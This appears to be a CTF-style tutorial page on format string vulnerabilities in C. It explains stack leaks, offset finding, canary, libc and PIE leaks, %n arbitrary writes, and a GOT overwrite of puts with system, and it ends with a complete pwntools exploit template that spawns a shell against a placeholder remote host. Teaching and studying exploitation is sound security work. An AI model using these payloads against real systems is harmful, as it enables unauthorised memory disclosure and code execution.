Memory Corruption
Intermediate

Format String Vulnerabilities

Format string vulnerabilities occur when user input is passed directly to functions like printf() without proper formatting. These bugs enable reading/writing arbitrary memory locations.

Impact

Format string bugs can lead to: information disclosure (stack/heap leaks), arbitrary memory writes, stack canary bypass, and ultimately remote code execution.

The Vulnerability

❌ Vulnerable Code

c
char buf[100];
fgets(buf, 100, stdin);
printf(buf);  // User controls format string!

✓ Safe Code

c
char buf[100];
fgets(buf, 100, stdin);
printf("%s", buf);  // Format string is fixed

Useful Format Specifiers

Specifier Description Exploit Use
%x Print hex (32-bit) Leak stack values
%lx Print hex (64-bit) Leak stack values (x64)
%p Print pointer Leak addresses
%s Print string at address Read arbitrary memory
%n Write bytes printed Arbitrary write!
%hn Write 2 bytes Partial overwrite
%N$x Direct parameter access Read specific stack position

Reading the Stack

Basic Stack Leak

bash
# Input multiple %x to dump stack values
%x.%x.%x.%x.%x.%x.%x.%x

# Output shows stack contents:
# 0.64.f7fc4580.0.f7fc4580.ffffffff.deadbeef.41414141

# Using %p for cleaner pointer output (with 0x prefix)
%p.%p.%p.%p.%p.%p.%p.%p

Direct Parameter Access

Use %N$x to directly access the Nth argument on the stack:

bash
# Read 6th value on stack (often where our input lands)
%6$x

# Read 10th value as pointer
%10$p

# Find where your input lands on the stack
AAAA%6$x%7$x%8$x%9$x%10$x
# Look for 41414141 (hex for AAAA)

Finding Your Input Offset

python
from pwn import *

# Automated offset finder
def find_offset(p, max_offset=50):
    for i in range(1, max_offset):
        p.sendline(f'AAAA%{i}$x')
        output = p.recvline()
        if b'41414141' in output:
            print(f'[+] Input found at offset {i}')
            return i
    return None

Information Leaks

Leaking Stack Canary

python
# Stack canary is usually at a fixed offset from buffer
# Find it by leaking stack values

# Example: Canary at offset 15
%15$p

# In pwntools exploit:
p.sendline('%15$p')
canary = int(p.recv().strip(), 16)
print(f'[+] Leaked canary: {hex(canary)}')

Leaking Libc Address

python
# Return addresses on stack often point to libc
# __libc_start_main+X is commonly found

p.sendline('%41$p')  # Offset varies by binary
libc_leak = int(p.recv().strip(), 16)

# Calculate libc base
libc_start_main_offset = 0x21bf7  # Find with: nm -D libc.so.6 | grep __libc_start_main
libc_base = libc_leak - libc_start_main_offset

print(f'[+] Libc base: {hex(libc_base)}')

Leaking PIE Base

python
# Find return addresses to main binary
p.sendline('%43$p')  # Adjust offset
pie_leak = int(p.recv().strip(), 16)

# Calculate base
main_offset = 0x1234  # From binary analysis
pie_base = pie_leak - main_offset

print(f'[+] PIE base: {hex(pie_base)}')

Arbitrary Write with %n

How %n Works

The %n specifier writes the number of bytes printed so far to the address on the stack. Combined with padding and direct parameter access, this enables writing arbitrary values.

Basic %n Write

python
# Write value 0x64 (100) to address 0x08048000
# Place target address on stack, then use %n

# 32-bit example:
# 1. Put address at offset 7 on stack
# 2. Print 100 bytes
# 3. %7$n writes 100 to address at offset 7

payload = p32(0x08048000)  # Target address
payload += b'%96c'          # Print 96 more chars (100 total with addr)  
payload += b'%7$n'          # Write to offset 7

# Verify: 4 (addr) + 96 = 100 bytes = 0x64 written

Writing Large Values

Use %hn (2 bytes) or %hhn (1 byte) to write in chunks:

python
from pwn import *

target_addr = 0x0804c000  # GOT entry or return address
target_value = 0xdeadbeef

# Write 2 bytes at a time using %hn
# First write 0xbeef to target_addr
# Then write 0xdead to target_addr+2

low_bytes = target_value & 0xffff         # 0xbeef
high_bytes = (target_value >> 16) & 0xffff  # 0xdead

# Build payload (assuming input at offset 6)
payload = p32(target_addr)      # offset 6
payload += p32(target_addr + 2) # offset 7

# Calculate padding
first_write = low_bytes - 8
second_write = high_bytes - low_bytes

payload += f'%{first_write}c%6$hn'.encode()
payload += f'%{second_write}c%7$hn'.encode()

print(payload)

Using pwntools fmtstr_payload

python
from pwn import *

# Automatic format string payload generation
context.arch = 'i386'  # or 'amd64'

# Find offset where input appears on stack
offset = 6

# Create payload to write value to address
payload = fmtstr_payload(offset, {
    0x0804c000: 0xdeadbeef,  # GOT overwrite
    0x0804c004: 0xcafebabe   # Multiple writes
})

# For 64-bit, addresses may contain null bytes
# Use write_size parameter:
payload = fmtstr_payload(offset, {target: value}, write_size='short')

GOT Overwrite Attack

Overwrite a GOT entry to redirect function calls:

python
from pwn import *

elf = ELF('./vuln')
libc = ELF('./libc.so.6')

# Leak libc address first
p.sendline('%41$p')
libc_leak = int(p.recv().strip(), 16)
libc_base = libc_leak - libc.symbols['__libc_start_main'] - 243

# Calculate system address
system_addr = libc_base + libc.symbols['system']

# Overwrite puts@got with system
puts_got = elf.got['puts']
offset = 6

payload = fmtstr_payload(offset, {puts_got: system_addr})
p.sendline(payload)

# Next call to puts() will call system() instead
p.sendline('/bin/sh')
p.interactive()

Complete Exploit Template

fmt_exploit.py
python
#!/usr/bin/env python3
from pwn import *

context.arch = 'amd64'
context.log_level = 'info'

elf = ELF('./vuln')
libc = ELF('./libc.so.6')

# p = process('./vuln')
p = remote('pwn.ctf.com', 1337)

# Step 1: Find format string offset
# Send AAAAAAAA%p.%p.%p... and find where 0x4141414141414141 appears
FMT_OFFSET = 6

# Step 2: Leak addresses
# Leak libc (adjust offsets based on binary)
p.sendlineafter('> ', '%41$p')
libc_leak = int(p.recvline().strip(), 16)
libc.address = libc_leak - libc.symbols['__libc_start_main'] - 243
log.info(f'Libc base: {hex(libc.address)}')

# Leak stack canary if needed
p.sendlineafter('> ', '%15$p')
canary = int(p.recvline().strip(), 16)
log.info(f'Canary: {hex(canary)}')

# Step 3: Write exploit
# Overwrite return address or GOT entry
target = elf.got['puts']
value = libc.symbols['system']

payload = fmtstr_payload(FMT_OFFSET, {target: value})
p.sendlineafter('> ', payload)

# Step 4: Trigger (call puts with "/bin/sh")
p.sendlineafter('> ', '/bin/sh')
p.interactive()

Mitigations & Bypasses

FORTIFY_SOURCE

Replaces printf with __printf_chk which limits %n writes. Bypass by targeting writable sections or using %s leaks.

RELRO (Full)

GOT is read-only after startup. Target return addresses on stack, __malloc_hook, or .fini_array instead.